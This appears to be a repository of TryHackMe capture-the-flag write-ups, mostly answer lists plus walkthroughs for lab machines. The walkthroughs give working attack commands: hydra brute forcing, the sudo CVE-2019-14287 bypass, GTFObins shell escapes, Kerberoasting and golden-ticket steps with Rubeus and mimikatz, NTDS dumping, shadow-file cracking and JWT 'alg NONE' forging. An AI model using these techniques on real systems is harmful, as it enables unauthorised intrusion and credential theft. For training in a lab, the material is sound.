FILE: Advent-of-Cyber-2021/Day-13-They_Lost_The_Plan/README.md
================================================
# Day 13 - They Lost The Plan!
- Complete the username: p.....
- `*****`
- What is the OS version?
- `**********************`
- What backup service did you find running on the system?
- `***********`
- What is the path of the executable for the backup service you have identified?
- `**************************************************`
- Run the whoami command on the connection you have received on your attacking machine. What user do you have?
- `**********************`
- What is the content of the flag.txt file?
- `************`
- The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
- `**********`
================================================
FILE: Advent-of-Cyber-2021/Day-14-Dev(Insecure)Ops/README.md
================================================
Day 14 - Dev(Insecure)Ops
- How many pages did the dirb scan find with its default wordlist?
- `*`
- How many scripts do you see in the /home/thegrinch/scripts folder?
- `*`
- What are the five characters following $6$G in pepper's password hash?
- `*****`
- What is the content of the flag.txt file on the Grinch's user’s desktop?
- `***************************`
================================================
FILE: Advent-of-Cyber-2021/Day-15-The_Grinchs_day_off/README.md
================================================
# Day 15 - The Grinchs day off
================================================
FILE: Advent-of-Cyber-2021/Day-16-Ransomware_Madness/README.md
================================================
# Day 16 - Ransomware Madness
- !!! ВАЖНЫЙ !!!
No answer needed
- What is the operator's username?
- `************`
- What social media platform is the username associated with?
- `*******`
- What is the cryptographic identifier associated with the operator?
- `********************************`
- What platform is the cryptographic identifier associated with?
- `*********`
- What is the bitcoin address of the operator?
- `**********************************`
- What platform does the operator leak the bitcoin address on?
- `******`
- What is the operator's personal email?
- `*****************`
- What is the operator's real name?
- `***********`
================================================
FILE: Advent-of-Cyber-2021/Day-17-Elf_Leaks/README.md
================================================
# Day 17 - Elf Leaks
- What is the name of the S3 Bucket used to host the HR Website announcement?
- `******.*******************.***`
- What is the message left in the flag.txt object from that bucket?
- `**** **** ** *** **** ***** **** **** *** ***** ** ** **** ** *****`
- What other file in that bucket looks interesting to you?
- `*********.***`
- What is the AWS Access Key ID in that file?
- `********************`
- What is the AWS Account ID that access-key works for?
- `************`
- What is the Username for that access-key?
- `***********.***`
- There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?
- `*********`
- What is the database password stored in Secrets Manager?
- `***********`
================================================
FILE: Advent-of-Cyber-2021/Day-18-Playing_With_Containers/README.md
================================================
# Day 18 - Playing With Containers
- What command will list container images stored in your local container registry?
- `****** ******`
- What command will allow you to save a docker image as a tar archive?
- `****** ****`
- What is the name of the file (including file extension) for the configuration, repository tags, and layer hash values stored in a container image?
- `********.****`
- What is the token value you found for the bonus challenge?
- `********************************`
================================================
FILE: Advent-of-Cyber-2021/Day-19-Something_Phishy_Is_Going_On/README.md
================================================
# Day 19 - Something Phishy Is Going On
- Who was the email sent to? (Answer is the email address)
- `******************.***`
- Phishing emails use similar domains of their targets to increase the likelihood the recipient will be tricked into interacting with the email. Who does it say the email was from? (Answer is the email address)
- `********************.****`
- Sometimes phishing emails have a different reply-to email address. If this email was replied to, what email address will receive the email response?
- `****************.******`
- Less sophisticated phishing emails will have typos. What is the misspelled word?
- `*******`
- The email contains a link that will redirect the recipient to a fraudulent website in an effort to collect credentials. What is the link to the credential harvesting website?
- `*****://**********.******/***/*******/`
- View the email source code. There is an unusual email header. What is the header and its value?
- `*************: ****`
- You received other reports of phishing attempts from other colleagues. Some of the other emails contained attachments. Open attachment.txt. What is the name of the attachment?
- `***************************.***`
- What is the flag in the PDF file?
- `***{***************************}`
If you want to learn more about phishing, check out the "Phishing" module on TryHackMe.
No answer needed
================================================
FILE: Advent-of-Cyber-2021/Day-20-What_s_the_Worst_That_Could_Happen/README.md
================================================
# Day 20 - What's the Worst That Could Happen?
- Open the terminal and navigate to the file on the desktop named 'testfile'. Using the 'strings' command, check the strings in the file. There is only a single line of output to the 'strings' command. What is the output?
- `**************************}*****************************************`
- Check the file type of 'testfile' using the 'file' command. What is the file type?
- `***** ***** **** *****`
- Calculate the file's hash and search for it on VirusTotal. When was the file first seen in the wild?
- `********** **:**:**`
- On VirusTotal's detection tab, what is the classification assigned to the file by Microsoft?
- `*****:***/***************`
- Go to this link to learn more about this file and what it is used for. What were the first two names of this file?
- `*******.*** ** ************.***`
- The file has 68 characters in the start known as the known string. It can be appended with whitespace characters upto a limited number of characters. What is the maximum number of total characters that can be in the file?
- `***`
================================================
FILE: Advent-of-Cyber-2021/Day-21-Needles_In_Computer_Stacks/README.md
================================================
# Day 21 - Needles In Computer Stacks
- We changed the text in the string $a as shown in the eicaryara rule we wrote, from X5O to X50, that is, we replaced the letter O with the number 0. The condition for the Yara rule is $a and $b and $c and $d. If we are to only make a change to the first boolean operator in this condition, what boolean operator shall we replace the 'and' with, in order for the rule to still hit the file?
- `**`
- What option is used in the Yara command in order to list down the metadata of the rules that are a hit to a file?
- `**`
- What section contains information about the author of the Yara rule?
- `********`
- What option is used to print only rules that did not hit?
- `**`
- Change the Yara rule value for the $a string to X50. Rerun the command, but this time with the -c option. What is the result?
- `*`
================================================
FILE: Advent-of-Cyber-2021/Day-22-How_It_Happened/README.md
================================================
# Day 22 - How It Happened
- What is the username (email address of Grinch Enterprises) from the decoded script?
- `******.***********.**********.***`
- What is the mailbox password you found?
- `*******************`
- What is the subject of the email?
- `********* ********`
- What port is the script using to exfiltrate data from the North Pole?
- `***`
- What is the flag hidden found in the document that Grinch Enterprises left behind? (Hint: use the following command oledump.py -s {stream number} -d, the answer will be in the caption).
- `********************`
- There is still a second flag somewhere... can you find it on the machine?
- `*********************`
================================================
FILE: Advent-of-Cyber-2021/Day-23-PowershELlF_Magic/README.md
================================================
# Day 23 - PowershELlF Magic
- What command was executed as Elf McNealy to add a new user to the machine?
- `****************`
- What user executed the PowerShell file to send the password.txt file from the administrator's desktop to a remote server?
- `*****`
- What was the IP address of the remote server? What was the port used for the remote connection? (format: IP,Port)
- `**.**.***.**,****`
- What was the encryption key used to encrypt the contents of the text file sent to the remote server?
- `********************************`
- What application was used to delete the password.txt file?
- `*******.***`
- What is the date and timestamp the logs show that password.txt was deleted? (format: MM/DD/YYYY H:MM:SS PM)
- `**/**/**** *:**:** **`
- What were the contents of the deleted password.txt file?
- `******* *******: ***************************`
================================================
FILE: Advent-of-Cyber-2021/Day-24-Learning_From_The_Grinch/README.md
================================================
# Day 24 - Learning From The Grinch
- What is the username of the other user on the system?
- `*****`
- What is the NTLM hash of this user?
- `********************************`
- What is the password for this user?
- `**********`
================================================
FILE: Advent-of-Cyber-2021/README.md
================================================
# Advent of Cyber 2021 🎄🎅
## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)
For this year I didn't provide my solution to the challenges since there are ready amazing YT videos. Thanks THM :)
================================================
FILE: Agent-Sudo/README.md
================================================
# Agent Sudo
- Deploy the machine
no answer needed
- How many open ports?
- `nmap <TARGET_IP>`
- `3`
- How you redirect yourself to a secret page?
- `user-agent`
- What is the agent name?
- Let's try changing the user-agent.
- `curl -A "A" -L <TARGET_IP>`. Mmmmh...
- `curl -A "C" -L <TARGET_IP>`. Got it.
- `chris`
- FTP password
- `hydra -l chris -P /usr/share/wordlists/rockyou.txt <TARGET_IP> -vV -t 4 ftp`
- `crystal`
- steg password
- `ftp <TARGET_IP>`
- Enter username `chris` and password `crystal`.
- `mget *`
- By `ToAgentJ.txt` I can understand there is a pic that isn't a photo actually.
- In fact, `binwalk -e cutie.png` extracts useful data.
- `cd _cutie.png.extracted`
- `zip2john 8702.zip > zip.hash`
- `john zip.hash` and we get the password
- `7z e zip.hash`, enter `Y` and the password.
- `cat ToAgentR.txt`
- Inserting that weird string into CyberChef (from Base64) we get `Area51`.
- `Area51`
- Zip file password
- `alien`
- Who is the other agent (in full name)?
- `steghide info cute-alien.jpg`, enter `y` and the passphrase (`Area51`).
- There is a message.txt inside
- `steghide extract -sf cute-alien.jpg`
- `james`
- SSH password
- `hackerrules!`
- What is the user flag?
- `ssh james@<TARGET_IP>` and then enter the password.
- `cat user_flag.txt`
- `b0**975e8******041**********13c7`
- What is the incident of the photo called?
- Enable ssh on your machine
- `scp Alien_autospy.jpg YOUR-USER-HERE@YOUR-IP-HERE:Alien_autospy.jpg`
- Search that photo with Google Reverse Image.
- `Roswell Alien Autopsy`
- CVE number for the escalation (Format: CVE-xxxx-xxxx)
- `sudo -l`
- `CVE-2019-14287` ([exploit-db](https://www.exploit-db.com/))
- What is the root flag?
- `sudo -u \#$((0xffffffff)) /bin/bash`
- `id`
- `cat /root/root.txt`
- `b53**2f55b57******3341**********`
- `Deskel`
================================================
FILE: Agent-Sudo/To_agentJ.txt
================================================
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
================================================
FILE: Agent-Sudo/_cutie.png.extracted/To_agentR.txt
================================================
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
================================================
FILE: Agent-Sudo/_cutie.png.extracted/zip.hash
================================================
8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip
================================================
FILE: Agent-Sudo/message.txt
================================================
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
================================================
FILE: Anonymous/README.md
================================================
# Anonymous
- Enumerate the machine. How many ports are open?
- `scilla port -target <TARGET_IP>`
- `*`
- What service is running on port 21?
- `ftp`
- What service is running on ports 139 and 445?
- `smb`
- There's a share on the user's computer. What's it called?
- `smbclient -L <TARGET_IP>`
- `****`
- user.txt
- Connect in anonymous mode via ftp and download everything.
- We can write `clean.sh`, so add a reverse shell.
- Fire up a shell and cat the flag.
- `**********************`
- root.txt
- `sudo -l`
- `find / -user root -perm -u=s 2>/dev/null`
- `/usr/bin/env`
- `env /bin/sh -p`
- `cat /root/root.txt`
- `*******************************`
================================================
FILE: Attacking-Kerberos/README.md
================================================
# Attacking Kerberos
- What does TGT stand for?
- `ticket granting ticket`
- What does SPN stand for?
- `service principal name`
- What does PAC stand for?
- `privilege attribute certificate`
- What two services make up the KDC?
- `AS, TGS`
- Deploy the Machine
no answer needed
- How many total users do we enumerate?
- `sudo vim /etc/hosts`, insert the row `<TARGET_IP> CONTROLLER.local`
- Download [User.txt](https://github.com/Cryilllic/Active-Directory-Wordlists/blob/master/User.txt)
- `kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt`
- `**`
- What is the SQL service account name?
- `sql*******`
- What is the second "machine" account name?
- `*******2`
- What is the third "user" account name?
- `****3`
- Which domain admin do we get a ticket for when harvesting tickets?
- `ssh Administrator@controller.local`, `yes` and inters password.
- `cd Downloads`
- `Rubeus.exe harvest /interval:30`
- `echo <TARGET_IP> CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts`
- `Rubeus.exe brute /password:Password1 /noticket`
- `Ad************`
- Which domain controller do we get a ticket for when harvesting tickets?
- `**********-1`
- What is the HTTPService Password?
- `cd Downloads`
- `Rubeus.exe kerberoast`
- `copy the hash onto your attacker machine and put it into a .txt file so we can crack it with hashcat`
- [wordlist](https://raw.githubusercontent.com/Cryilllic/Active-Directory-Wordlists/master/Pass.txt)
- `hashcat -m 13100 -a 0 hash.txt Pass.txt`
- `**********`
- What is the SQLService Password?
- `**************`
- What hash type does AS-REP Roasting use?
- `cd Downloads`
- `Rubeus.exe asreproast`
- `Transfer the hash from the target machine over to your attacker machine and put the hash into a txt file`
- `Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User.....`
- `hashcat -m 18200 hash.txt Pass.txt`
- `Kerberos * ****** ***** **`
- Which User is vulnerable to AS-REP Roasting?
- `****3`
- What is the User's Password?
- `*********3`
- Which Admin is vulnerable to AS-REP Roasting?
- `*****2`
- What is the Admin's Password?
- `**********`
- I understand how a pass the ticket attack works
no answer needed
- What is the SQLService NTLM Hash?
- `cd downloads && mimikatz.exe`
- `privilege::debug`
- `lsadump::lsa /inject /name:krbtgt`
- `Kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:`
- `misc::cmd`
- `****************************`
- What is the Administrator NTLM Hash?
- `****************************`
- I understand how to implant a skeleton key into a domain controller with mimikatz
no answer needed
- I Understand the Basics of Attacking Kerberos
no answer needed
================================================
FILE: Attacktive-Directory/README.md
================================================
# Attacktive Directory
- Initiate the VPN connection and deploy the machine!
no answer needed
- Read and follow along with the above.
no answer needed
- What tool will allow us to enumerate port 139/445?
- `enum4linux`
- What is the NetBIOS-Domain Name of the machine?
- `THM-AD`
- What invalid TLD do people commonly use for their Active Directory Domain?
- `.local`
- What command within Kerbrute will allow us to enumerate valid usernames?
- `userenum`
- What notable account is discovered? (These should jump out at you)
- `sudo echo <TARGET_IP> spookysec.local >> /etc/hosts`
- `kerbrute userenum --dc spookysec.local -d spookysec.local User.txt`
- `sv*******`
- What is the other notable account is discovered? (These should jump out at you)
- `******`
- We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
- `impacket-GetNPUsers spookysec.local/sv******** -no-pass`
- `sv*******`
- Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
- `kerberos * ****** ***** 32`
- What mode is the hash?
- `182**`
- Now crack the hash with the modified password list provided, what is the user accounts password?
- `hashcat -m 182** kerberos_hash Pass.txt --force`
- `**************`
- Using utility can we map remote SMB shares?
- `smbclient`
- Which option will list shares?
- `-l`
- How many remote shares is the server listing?
- `smbclient -L spookysec.local -U 'sv*******'`
- `*`
- There is one particular share that we have access to that contains a text file. Which share is it?
- `msfconsole`
- `search admin/smb/download_file`
- `use 0`
- `show options`
- `set RHOSTS spookysec.local`
- `set RPATH backup_credentials.txt`
- `set SMBDOMAIN spookysec.local`
- `set SMBPASS **************`
- `set SMBSHARE backup`
- `set SMBUSER sv*******`
- `exploit`
- `backup`
- What is the content of the file?
- `***********************************************************`
- Decoding the contents of the file, what is the full contents?
- `echo ***************************************** | base64 -d`
- `********************************`
- What method allowed us to dump NTDS.DIT?
- `DRS****`
- What is the Administrators NTLM hash?
- `impacket-secretsdump -just-dc ba**************************`
- `******************************`
- What method of attack could allow us to authenticate as the user without the password?
- `pass the hash`
- Using a tool called Evil-WinRM what option will allow us to use a hash?
- `-h`
- svc-admin
- `************************+`
- backup
- `************************`
- Administrator
- `*************************`
================================================
FILE: Authenticate/README.md
================================================
# Authenticate
- Deploy the VM
no answer needed
- What is the flag you found after logging as Jack?
- `fad9d***********************`
- Now try the same thing for username Mike
no answer needed
- What is the flag you found after logging as Mike?
- `e1faaa************************`
- What is the flag that you found in darren's account?
- `fe860*************************`
- Now try to do the same trick and see if you can login as arthur.
no answer needed
- What is the flag that you found in arthur's account?
- `d9ac0*************************`
- Use the same method to find identity of admin user and retrieve the flag?
- `echo "{"typ":"JWT","alg":"NONE"}" | base64`
- ` echo "{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":0}" | base64`
- `92498*******************`
- Find the way to get into superadmin ad
no answer needed
- What is the password for superadmin account?
- `abc******`
- What is the flag you found in superadmin account?
- `7210*****************`
================================================
FILE: Avengers-Blog/README.md
================================================
# Avengers Blog
- Connect to our network by going to your access page. This is important as you will not be able to access the machine without connecting!
no answer needed
- Deploy the machine by clicking the green "Deploy" button on this task and access its webserver.
no answer needed
- On the deployed Avengers machine you recently deployed, get the flag1 cookie value.
- `*****************`
- Look at the HTTP response headers and obtain flag 2.
- `headers***************`
- Look around the FTP share and read flag 3!
- `nmap -v <TARGET_IP>`
- `ftp <TARGET_IP>`, enter user and password.
- `ls`
- `cd files`
- `get flag3.txt`
- `exit`
- `cat flag3.txt`
- `*************************************`
- What is the directory that has an Avengers login?
- `scilla dir -target <TARGET_IP>`
- `/p*****`
- Log into the Avengers site. View the page source, how many lines of code are there?
- `***`
- Read the contents of flag5.txt
- `rev ../flag5.txt`
- `echo "FLAG" | rev`
- `********************************`
================================================
FILE: Baron-Samedit/README.md
================================================
# Baron Samedit
- Deployed!
no answer needed
- After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)?
- `ssh tryhackme@<TARGET_IP>` and enter the password `tryhackme`
- `cd Exploit`
- `make`
- `sudo-h****************`
- Run the exploit! You should now have a root shell -- what is the flag in /root/flag.txt?
- `cat /etc/os-release*`
- `./sudo-h**************** 0`
- `cd /root`
- `cat flag.txt`
- `THM{********************************}`
================================================
FILE: Bash-Scripting/README.md
================================================
# Bash Scripting
- Are you ready to go!
no answer needed
- What piece of code can we insert at the start of a line to comment out our code?
- `#`
- What will the following script output to the screen, echo “BishBashBosh”
- `BishBashBosh`
- What would this code return?
- `Jammy is 21 years old`
- How would you print out the city to the screen?
- `echo $city`
- How would you print out the country to the screen?
- `echo $country`
- How can we get the number of arguments supplied to a script?
- `$#`
- How can we get the filename of our current script(aka our first argument)?
- `$0`
- How can we get the 4th argument supplied to the script?
- `$4`
- If a script asks us for input how can we direct our input into a variable called ‘test’ using “read”
- `read test`
- What will the output of “echo $1 $3” if the script was ran with “./script.sh hello hola aloha”
- `hello aloha`
- What would be the command to print audi to the screen using indexing.
- `echo "${cars[1]}"`
- If we wanted to remove tesla from the array how would we do so?
- `unset cars[3]`
- How could we insert a new value called toyota to replace tesla?
- `cars[3]="toyota"`
- What is the flag to check if we have read access to a file?
- `-r`
- What is the flag to check to see if it's a directory?
- `-d`
- Well done!
no answer needed
================================================
FILE: Bebop/README.md
================================================
# Bebop
- Deploy the machine
no answer needed
- What is your codename?
- `pilot`
- What is the User Flag?
- `scilla port -target <TARGET_IP>`
- `nmap -p 22,23 -A <TARGET_IP>`
- `telnet <TARGET_IP> 23` as `pilot`
- `ls`
- `cat user.txt`
- `**********************`
- What is the Root Flag?
- `sudo -l`
- `(root) NOPASSWD: /usr/local/bin/busybox`
- Visit GTFObins, busybox.
- `sudo busybox sh`
- `id`
- `cat /root/root.txt`
- `**************************`
- What is the low privilleged user?
- `pilot`
- What binary was used to escalate privileges?
- `busybox`
- What service was used to gain an initial shell?
- `telnet`
- What Operating System does the drone run?
- `FreeBSD`
- Watch the video.
no answer needed
================================================
FILE: Bolt/README.md
================================================
# Bolt
- Start the machine
no answer needed
- What port number has a web server with a CMS running?
- `nmap -sV <TARGET_IP>`
- `8000`
- What is the username we can find in the CMS?
- `bolt`
- What is the password we can find for the username?
- `*****d*in123`
- What version of the CMS is installed on the server? (Ex: Name 1.1.1)
- Login into the page `<TARGET_IP>/bolt` with username and password previously found.
- `Bolt 3.7.1`
- There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?
- Search on Google `Bolt RCE Exploit DB`
- `***2*`
- Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)
- `msfconsole`
- `search bolt`
- `use *`
- `exploit/unix/******************************`
- Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
no answer needed
- `set LHOST <YOUR_IP>`
- `set LPORT 1234`
- `set RHOST <TARGET_IP>`
- `set USERNAME bolt`
- `set PASSWORD ************`
- Look for flag.txt inside the machine.
- `exploit`
- `cat $(find / | grep flag.txt)`
- `THM{***************************}`
================================================
FILE: Bounty-Hacker/README.md
================================================
# Bounty Hacker
You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!
- Deploy the machine.
no answer needed
- Find open ports on the machine
no answer needed
- `nmap -Pn <TARGET_IP>`
- Who wrote the task list?
- `ftp <TARGET_IP>`
- `user`
- `anonymous`
- `recv locks.txt`
- `recv task.txt`
- `cat task.txt`
- `lin`
- What service can you bruteforce with the text file found?
- `ssh`
- What is the users password?
- `hydra -s 22 -v -V -l 'lin' -P locks.txt -t 8 <TARGET_IP> ssh`
- `RedDr4gonSynd1cat3`
- user.txt
- `ssh lin@<TARGET_IP>` and the enter `yes` and the password `RedDr4gonSynd1cat3`
- `ls`
- `cat user.txt`
- `THM{******SyNd1C4T3}`
- root.txt
- Type `sudo -l`, enter the password and you can see lin user can run `tar` command with sudo.
- Search on [GTFObins](https://gtfobins.github.io/) `tar`
- Then search for `sudo`
- Found this: `sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`
- Execute this and then `cat /root/root.txt`
- `THM{*************}`
================================================
FILE: Bounty-Hacker/locks.txt
================================================
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
================================================
FILE: Bounty-Hacker/task.txt
================================================
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
================================================
FILE: Brooklyn-Nine-Nine/README.md
================================================
# Brooklyn Nine Nine
- User flag
- `scilla port -p -1000 <TARGET_IP>`
- Three ports open.
- `ftp <TARGET_IP>` with username anonymous and no pwd.
- `get note_to_jake.txt`
- `cat note_to_jake.txt`
- Cool.
- `hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh://<TARGET_IP> -f -VV -t 4`
- `ssh jake@<TARGET_IP>` and enter the pwd.
- `ls -alh`
- `cd ..`
- `cd holt`
- `ls -lah`
- `cat user.txt`
- `********************************`
- Root flag
- `sudo -l`
- `sudo less /root/root.txt`
- `********************************`
================================================
FILE: Brute-It/README.md
================================================
# Brute It
- Deploy the machine
no answer needed
- How many ports are open?
- `nmap -p- <TARGET_IP>` or
- `scilla port -target <TARGET_IP>`
- `2`
- What version of SSH is running?
- `nmap -sS -sV -Pn -p 22 <TARGET_IP>`
- `OpenSSH 7.6p1`
- What version of Apache is running?
- `nmap -sS -sV -Pn -p 80 <TARGET_IP>`
- `2.*.**`
- Which Linux distribution is running?
- `Ubuntu`
- What is the hidden directory?
- `scilla dir -target <TARGET_IP>`
- `/admin`
- What is the user:password of the admin panel?
- `hydra -l admin -P /usr/share/wordlists/rockyou.txt <TARGET_IP> http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid" -f`
- `admin:******`
- What is John's RSA Private Key passphrase?
- `python2 /usr/share/john/ssh2john.py rsa_priv > hash`
- `john --wordlist=/usr/share/wordlists/rockyou.txt hash`
- `**********`
- user.txt
- `chmod 400 hash`
- `ssh john@<TARGET_IP> -i rsa_priv and enter the passphrase`
- `cat user.txt`
- `THM{***************************}`
- Web flag
- `THM{********************}`
- What is the root's password?
- `sudo cat /etc/shadow`
- `sudo cat /etc/passwd`
- Copy these two files into your machine
- `unshadow passwd shadow > passwords.txt`
- `john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt`
- `*********`
- root.txt
- `sudo -l`
- https://gtfobins.github.io/gtfobins/cat/
- `sudo cat /root/` :)
================================================
FILE: Burp-Suite/README.md
================================================
# Burp Suite
- Read the overview and continue on into installation!
no answer needed
- If you'll be installing Burp (as it's commonly referred to) from scratch, you'll need to first visit this link: https://portswigger.net/burp/communitydownload
no answer needed
- Once you've reached the Port Swigger downloads page, go ahead and download the appropriate version for your operating system
no answer needed
- Once you've got everything setup move onto our next task, Gettin' [CA] Certified!
no answer needed
- Launch Burp!
no answer needed
- Once this pops-up, click 'Temporary project' and then 'Next'.
no answer needed
- This option is included as it can be incredibly useful to create a custom configuration file for your proxy or other settings, especially depending on how your network configuration and/or if Burp Suite is being launched remotely such as via x11 forwarding.
no answer needed
- Finally, let's go ahead and Start Burp! Click 'Start Burp' now!
no answer needed
- Since we now have Burp Suite running, the proxy service will have started by default with it. In order to fully leverage this proxy, we'll have to install the CA certificate included with Burp Suite (otherwise we won't be able to load anything with SSL). To do this, let's launch Firefox now!
no answer needed
- Go ahead and install this now!
no answer needed
- Next, we'll move onto adding the certificate for Burp!
no answer needed
- With Firefox, navigate to the following address: http://localhost:8080
no answer needed
- Click on 'CA Certificate' in the top right to download and save the CA Certificate.
no answer needed
- Click on 'View Certificates'
no answer needed
- Next, in the Authorities tab click on 'Import'
no answer needed
- Navigate to where you saved the CA Certificate we downloaded previously. Click 'OK' once you've selected this certificate.
no answer needed
- Select 'OK' once you've done this. Congrats, we've now installed the Burp Suite CA Certificate!
no answer needed
- Which tool in Burp Suite can we use to perform a 'diff' on responses and other pieces of data?
- `Comparer`
- What tool could we use to analyze randomness in different pieces of data such as password reset tokens?
- `Sequencer`
- Which tool can we use to set the scope of our project?
- `Target`
- While only available in the premium versions of Burp Suite, which tool can we use to automatically identify different vulnerabilities in the application we are examining?
- `Scanner`
- Encoding or decoding data can be particularly useful when examining URL parameters or protections on a form, which tool allows us to do just that?
- `Decoder`
- Which tool allows us to redirect our web traffic into Burp for further examination?
- `Proxy`
- Simple in concept but powerful in execution, which tool allows us to reissue requests?
- `Repeater`
- With four modes, which tool in Burp can we use for a variety of purposes such as field fuzzing?
- `Intruder`
- Last but certainly not least, which tool allows us to modify Burp Suite via the addition of extensions?
- `Extender`
- With Burp Suite launched, let's first navigate to the 'User options' tab.
no answer needed
- Next, click on the 'Display' sub-tab.
no answer needed
- Now, click on the 'Look and feel' drop-down menu. Select 'Darcula'.
no answer needed
- Finally, close and relaunch Burp Suite to have dark theme (or whichever theme you picked) take effect.
no answer needed
- Deploy the VM attached to this task!
no answer needed
- By default, the Burp Suite proxy listens on only one interface. What is it? Use the format of IP:PORT
- `127.0.0.1:8080`
- In Burp Suite, navigate to the Intercept sub-tab of the Proxy section. Enable Intercept
no answer needed
- Take a look at the actions, which shortcut allows us to forward the request to Repeater?
- `CRTL-r`
- How about if we wanted to forward our request to Intruder?
- `CTRL-i`
- What is the name of the first section wherein general web requests (GET/POST) are saved?
- `http history`
- what is the name of the second section of our saved history in Burp Suite?
- `websockets history`
- Here we can apply further fine-grained rules to define which requests we would like to intercept. Perhaps the most useful out of the default rules is our only AND rule. What is it's match type?
- `url`
- How about it's 'Relationship'?
- `is in target scope`
- Before leaving the Proxy tab, switch Intercept to disabled. We'll still see the pages we navigate to in our history and the target tab, just having Intercept constantly stopping our requests for this next bit will get old fast.
no answer needed
- Navigate to the Target tab in Burp. In our last task, Proxy, we browsed to the website on our target machine (in this case OWASP Juice Shop). Find our target site in this list and right-click on it. Select 'Add to scope'.
no answer needed
- Clicking 'Add to scope' will trigger a pop-up. This will stop Burp from sending out-of-scope items to our site map.
no answer needed
- Select 'Yes' to close the popup.
no answer needed
- What do we call this representation of the collective web application?
- `site map`
- What is the term for browsing the application as a normal user prior to examining it further?
- `happy path`
- One last thing before moving on. Within the target tab, you may have noticed a sub-tab for issue definitions. Click into that now.
no answer needed
- Which poisoning issue arises when an application behind a cache process input that is not included in the cache key?
- `web cache poisoning`
- To start, click 'Account' (this might be 'Login' depending on the version of Juice Shop) in the top right corner of Juice Shop in order to navigate to the login page.
no answer needed
- Try logging in with invalid credentials. What error is generated when login fails?
- `Invalid email or password.`
- But wait, didn't we want to send that request to Repeater? Even though we didn't send it to Repeater initially via intercept, we can still find the request in our history. Switch over to the HTTP sub-tab of Proxy. Look through these requests until you find our failed login attempt. Right-click on this request and send it to Repeater and then send it to Intruder, too!
no answer needed
- Now that we've sent the request to Repeater, let's try adjusting the request such that we are sending a single quote (') as both the email and password. What error is generated from this request?
- `SQLITE_ERROR`
- Now that we've leveraged Repeater to gain proof of concept that Juice Shop's login is vulnerable to SQLi, let's try something a little more mischievous and attempt to leave a devastating zero-star review. First, click on the drawer button in the top-left of the application. If this isn't present for you, just skip to the next question.
no answer needed
- Next, click on 'Customer Feedback' (depending on the version of Juice Shop this also might be along the top of the page next to 'Login' under 'Contact Us')
no answer needed
- With the Burp proxy on submit feedback. Once this is done, find the POST request in your HTTP History in Burp and send it to Repeater.
no answer needed
- What field do we have to modify in order to submit a zero-star review?
- `rating`
- Submit a zero-star review and complete this challenge in Juice Shop!
no answer needed
- Which attack type allows us to select multiple payload sets (one per position) and iterate through them simultaneously?
- `pitchfork`
- How about the attack type which allows us to use one payload set in every single position we've selected simultaneously?
- `Battering ram`
- Which attack type allows us to select multiple payload sets (one per position) and iterate through all possible combinations?
- `cluster bomb`
- Perhaps the most commonly used, which attack type allows us to cycle through our payload set, putting the next available payload in each position in turn?
- `sniper`
- Download the wordlist attached to this room, this is a shortened version of the fuzzdb SQLi platform detection list.
no answer needed
- Return to the Intruder in Burp. In our previous task, we passed our failed login attempt to both Repeater and Intruder for further examination. Open up the Positions sub-tab in the Intruder tab with this request now and verify that 'Sniper' is selected as our attack type.
no answer needed
- Burp attempts to automatically highlight possible fields of interest for Intruder, however, it doesn't have it quite right for what we'll be looking at in this instance. Hit 'Clear' on the right-hand side to clear all selected fields.
no answer needed
- Next, let's highlight the email field between the double quotes ("). This will be whatever you entered in the email field for our previous failed login attempt.
no answer needed
- Now click 'Add' to select our email field as a position for our payloads.
no answer needed
- Next, let's switch to the payloads sub-tab of Intruder. Once there, hit 'Load' and select the wordlist you previously downloaded in question five that is attached to this task.
no answer needed
- Almost there! Scroll down and uncheck 'URL-encode these characters'. We don't want to have the characters sent in our payloads to be encoded as they otherwise won't be recognized by SQL.
no answer needed
